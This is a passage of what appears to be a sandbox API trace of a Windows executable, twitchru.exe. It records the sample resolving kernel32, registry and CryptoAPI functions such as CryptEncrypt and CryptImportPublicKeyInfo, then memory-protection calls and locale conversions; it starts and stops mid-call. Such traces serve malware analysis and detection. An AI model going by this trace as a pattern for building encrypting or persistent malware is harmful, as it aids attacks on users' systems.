lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76896020 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="CreateEventW") returned 0x76895fa0 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="TlsAlloc") returned 0x76889a70 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="TlsGetValue") returned 0x76881ba0 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="TlsSetValue") returned 0x76881da0 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="TlsFree") returned 0x76889930 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="GetSystemTimeAsFileTime") returned 0x76882b90 [0230.465] GetProcAddress (hModule=0x76870000, lpProcName="GetTickCount") returned 0x768957f0 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="GetModuleHandleW") returned 0x76889660 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="GetProcAddress") returned 0x76887940 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="CompareStringW") returned 0x76892230 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="LCMapStringW") returned 0x76889a40 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="GetLocaleInfoW") returned 0x7688c800 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="GetStringTypeW") returned 0x768879b0 [0230.466] GetProcAddress (hModule=0x76870000, lpProcName="GetCPInfo") returned 0x76889fc0 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="IsProcessorFeaturePresent") returned 0x76889680 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="UnhandledExceptionFilter") returned 0x768b28e0 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="SetUnhandledExceptionFilter") returned 0x7688a2c0 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="GetCurrentProcessId") returned 0x76881d90 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="InitializeSListHead") returned 0x76ff1fc0 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="IsDebuggerPresent") returned 0x7688a790 [0230.467] GetProcAddress (hModule=0x76870000, lpProcName="GetStartupInfoW") returned 0x7688a080 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="CreateTimerQueue") returned 0x768b0ae0 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="SetEvent") returned 0x768960c0 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="SignalObjectAndWait") returned 0x768b2850 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="SwitchToThread") returned 0x76889f30 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="CreateThread") returned 0x76889700 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="SetThreadPriority") returned 0x76889490 [0230.468] GetProcAddress (hModule=0x76870000, lpProcName="GetThreadPriority") returned 0x768896a0 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="GetLogicalProcessorInformation") returned 0x7688a550 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="CreateTimerQueueTimer") returned 0x76894a00 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="ChangeTimerQueueTimer") returned 0x768b07c0 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="DeleteTimerQueueTimer") returned 0x76894a20 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="GetNumaHighestNodeNumber") returned 0x7688a7e0 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="GetProcessAffinityMask") returned 0x7688a220 [0230.469] GetProcAddress (hModule=0x76870000, lpProcName="SetThreadAffinityMask") returned 0x7688e0e0 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="RegisterWaitForSingleObject") returned 0x76889580 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="UnregisterWait") returned 0x7688ed20 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="GetThreadTimes") returned 0x76889f80 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="FreeLibrary") returned 0x768898f0 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="FreeLibraryAndExitThread") returned 0x7688a570 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="GetModuleFileNameW") returned 0x76889560 [0230.470] GetProcAddress (hModule=0x76870000, lpProcName="GetModuleHandleA") returned 0x76889640 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="LoadLibraryExW") returned 0x76887920 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="GetVersionExW") returned 0x7688a2a0 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="VirtualAlloc") returned 0x76888b70 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="VirtualProtect") returned 0x76888c50 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="VirtualFree") returned 0x76888c70 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="ReleaseSemaphore") returned 0x768960a0 [0230.471] GetProcAddress (hModule=0x76870000, lpProcName="InterlockedPopEntrySList") returned 0x76fe8ef0 [0230.472] GetProcAddress (hModule=0x76870000, lpProcName="InterlockedPushEntrySList") returned 0x76fe8ed0 [0230.472] GetProcAddress (hModule=0x76870000, lpProcName="InterlockedFlushSList") returned 0x76ff1ee0 [0230.472] GetProcAddress (hModule=0x76870000, lpProcName="QueryDepthSList") returned 0x76fe98c0 [0230.474] GetProcAddress (hModule=0x76870000, lpProcName="UnregisterWaitEx") returned 0x7688eb50 [0230.474] GetProcAddress (hModule=0x76870000, lpProcName="LoadLibraryW") returned 0x7688a0b0 [0230.474] GetProcAddress (hModule=0x76870000, lpProcName="RtlUnwind") returned 0x76889a80 [0230.474] GetProcAddress (hModule=0x76870000, lpProcName="RaiseException") returned 0x76889ec0 [0230.474] GetProcAddress (hModule=0x76870000, lpProcName="HeapAlloc") returned 0x76fcda90 [0230.474] GetProcAddress (hModule=0x76870000, lpProcName="ExitThread") returned 0x76ff2570 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="GetModuleHandleExW") returned 0x76889fa0 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="HeapFree") returned 0x768825e0 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="HeapReAlloc") returned 0x76fcbae0 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="ExitProcess") returned 0x768974f0 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="GetCommandLineA") returned 0x7688a3c0 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="GetCommandLineW") returned 0x7688a4b0 [0230.475] GetProcAddress (hModule=0x76870000, lpProcName="GetACP") returned 0x76888770 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="GetFileType") returned 0x76896390 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="IsValidLocale") returned 0x7688a3f0 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="GetUserDefaultLCID") returned 0x76892350 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="EnumSystemLocalesW") returned 0x7688f9e0 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="FlushFileBuffers") returned 0x768962a0 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="GetConsoleCP") returned 0x76896860 [0230.476] GetProcAddress (hModule=0x76870000, lpProcName="GetConsoleMode") returned 0x76896870 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="SetFilePointerEx") returned 0x76896540 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="GetProcessHeap") returned 0x76887910 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="FindFirstFileExA") returned 0x76896220 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="IsValidCodePage") returned 0x7688a090 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="GetOEMCP") returned 0x7688fd10 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="GetEnvironmentStringsW") returned 0x7688a3b0 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="FreeEnvironmentStringsW") returned 0x7688a0f0 [0230.477] GetProcAddress (hModule=0x76870000, lpProcName="SetEnvironmentVariableA") returned 0x768b2560 [0230.478] GetProcAddress (hModule=0x76870000, lpProcName="SetStdHandle") returned 0x768b26a0 [0230.478] GetProcAddress (hModule=0x76870000, lpProcName="ReadConsoleW") returned 0x768968e0 [0230.478] GetProcAddress (hModule=0x76870000, lpProcName="CreateFileW") returned 0x76896180 [0230.478] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76e40000 [0230.478] GetProcAddress (hModule=0x76e40000, lpProcName="ShowWindow") returned 0x76e752a0 [0230.478] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76040000 [0230.478] GetProcAddress (hModule=0x76040000, lpProcName="CryptDeriveKey") returned 0x76075b70 [0230.479] GetProcAddress (hModule=0x76040000, lpProcName="RegCreateKeyExA") returned 0x7605f510 [0230.479] GetProcAddress (hModule=0x76040000, lpProcName="RegSetValueExA") returned 0x76060750 [0230.479] GetProcAddress (hModule=0x76040000, lpProcName="RegCloseKey") returned 0x7605efa0 [0230.479] GetProcAddress (hModule=0x76040000, lpProcName="CryptAcquireContextA") returned 0x76060c00 [0230.479] GetProcAddress (hModule=0x76040000, lpProcName="CryptReleaseContext") returned 0x76060ad0 [0230.479] GetProcAddress (hModule=0x76040000, lpProcName="CryptDestroyKey") returned 0x7605fc10 [0230.480] GetProcAddress (hModule=0x76040000, lpProcName="CryptDestroyHash") returned 0x7605fbf0 [0230.480] GetProcAddress (hModule=0x76040000, lpProcName="RegGetValueA") returned 0x76060da0 [0230.480] GetProcAddress (hModule=0x76040000, lpProcName="CryptHashData") returned 0x7605f950 [0230.480] GetProcAddress (hModule=0x76040000, lpProcName="CryptCreateHash") returned 0x7605f930 [0230.480] GetProcAddress (hModule=0x76040000, lpProcName="CryptEncrypt") returned 0x76075bd0 [0230.480] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x74400000 [0230.485] GetProcAddress (hModule=0x74400000, lpProcName="CryptStringToBinaryA") returned 0x74448040 [0230.485] GetProcAddress (hModule=0x74400000, lpProcName="CryptDecodeObjectEx") returned 0x74434470 [0230.485] GetProcAddress (hModule=0x74400000, lpProcName="CryptImportPublicKeyInfo") returned 0x7444de80 [0230.485] GetProcAddress (hModule=0x74400000, lpProcName="CryptBinaryToStringA") returned 0x74422290 [0230.485] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x209a908 | out: lpflOldProtect=0x209a908*=0x40) returned 1 [0230.485] VirtualProtect (in: lpAddress=0x401000, dwSize=0x3a098, flNewProtect=0x20, lpflOldProtect=0x209a908 | out: lpflOldProtect=0x209a908*=0x40) returned 1 [0230.486] VirtualProtect (in: lpAddress=0x43c000, dwSize=0x132d4, flNewProtect=0x2, lpflOldProtect=0x209a908 | out: lpflOldProtect=0x209a908*=0x40) returned 1 [0230.486] VirtualProtect (in: lpAddress=0x450000, dwSize=0x34a0, flNewProtect=0x4, lpflOldProtect=0x209a908 | out: lpflOldProtect=0x209a908*=0x40) returned 1 [0230.486] VirtualProtect (in: lpAddress=0x454000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x209a908 | out: lpflOldProtect=0x209a908*=0x40) returned 1 [0230.486] VirtualProtect (in: lpAddress=0x455000, dwSize=0x3984, flNewProtect=0x2, lpflOldProtect=0x209a908 | out: lpflOldProtect=0x209a908*=0x40) returned 1 [0230.487] GetProcAddress (hModule=0x76510000, lpProcName="FlsSetValue") returned 0x765c3770 [0230.487] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0230.487] GetProcAddress (hModule=0x76510000, lpProcName="InitializeCriticalSectionEx") returned 0x765c3ae0 [0230.488] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0230.489] GetProcAddress (hModule=0x76510000, lpProcName="FlsAlloc") returned 0x765c6530 [0230.489] GetLastError () returned 0x7a [0230.489] GetProcAddress (hModule=0x76510000, lpProcName="FlsGetValue") returned 0x765ba7b0 [0230.489] GetProcAddress (hModule=0x76510000, lpProcName="FlsSetValue") returned 0x765c3770 [0230.489] GetStartupInfoW (in: lpStartupInfo=0x209a874 | out: lpStartupInfo=0x209a874*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4240f0, hStdOutput=0x75f34c5c, hStdError=0xfffffffe)) [0230.489] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0230.489] GetFileType (hFile=0x38) returned 0x2 [0230.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0230.489] GetFileType (hFile=0x3c) returned 0x2 [0230.489] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0230.489] GetFileType (hFile=0x40) returned 0x2 [0230.489] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " [0230.489] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " [0230.489] GetACP () returned 0x4e4 [0230.490] IsValidCodePage (CodePage=0x4e4) returned 1 [0230.490] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x209a894 | out: lpCPInfo=0x209a894) returned 1 [0230.490] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x209a15c | out: lpCPInfo=0x209a15c) returned 1 [0230.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x209a770, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0230.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x209a770, cbMultiByte=256, lpWideCharStr=0x2099ef8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0230.490] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpCharType=0x209a170 | out: lpCharType=0x209a170) returned 1 [0230.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x209a770, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0230.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x209a770, cbMultiByte=256, lpWideCharStr=0x2099ea8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0230.490] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0230.490] GetProcAddress (hModule=0x76510000, lpProcName="LCMapStringEx") returned 0x765b3690 [0230.490] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0230.490] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x2099c98, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0230.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x209a670, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb0\x04\xbe\x77\xac\xa8\x09\x02\x38\x22\x43", lpUsedDefaultChar=0x0) returned 256 [0230.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x209a770, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0230.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x209a770, cbMultiByte=256, lpWideCharStr=0x2099ec8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳳BĀ") returned 256 [0230.490] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳳BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0230.490] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳳BĀ", cchSrc=256, lpDestStr=0x2099cb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0230.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 